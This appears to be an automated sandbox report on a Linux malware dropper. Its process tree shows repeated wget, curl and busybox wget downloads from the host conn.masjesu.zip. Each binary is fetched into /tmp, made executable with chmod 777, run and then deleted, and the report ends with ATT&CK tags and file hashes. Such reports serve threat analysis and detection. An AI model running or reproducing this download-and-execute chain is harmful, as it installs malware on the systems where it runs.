/tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵PID:946
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵PID:947
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- System Network Configuration Discovery
PID:950
-
-
/bin/chmodchmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵PID:953
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- System Network Configuration Discovery
PID:954
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- System Network Configuration Discovery
PID:957
-
-
/bin/chmodchmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵PID:960
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵PID:961
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- System Network Configuration Discovery
PID:964
-
-
/bin/chmodchmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵PID:967
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- System Network Configuration Discovery
PID:968
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵PID:971
-
-
/bin/chmodchmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵PID:974
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- System Network Configuration Discovery
PID:975
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- System Network Configuration Discovery
PID:978
-
-
/bin/chmodchmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵PID:981
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- System Network Configuration Discovery
PID:982
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵PID:985
-
-
/bin/chmodchmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵PID:988
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- System Network Configuration Discovery
PID:989
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:990
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- System Network Configuration Discovery
PID:992
-
-
/bin/chmodchmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- File and Directory Permissions Modification
PID:993
-
-
/tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- Executes dropped EXE
PID:994
-
-
/bin/rmrm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵PID:995
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- System Network Configuration Discovery
PID:996
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:997
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- System Network Configuration Discovery
PID:999
-
-
/bin/chmodchmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- File and Directory Permissions Modification
PID:1000
-
-
/tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- Executes dropped EXE
PID:1001
-
-
/bin/rmrm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵PID:1002
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- System Network Configuration Discovery
PID:1003
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1004
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- System Network Configuration Discovery
PID:1006
-
-
/bin/chmodchmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- File and Directory Permissions Modification
PID:1007
-
-
/tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- Executes dropped EXE
PID:1008
-
-
/bin/rmrm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵PID:1009
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97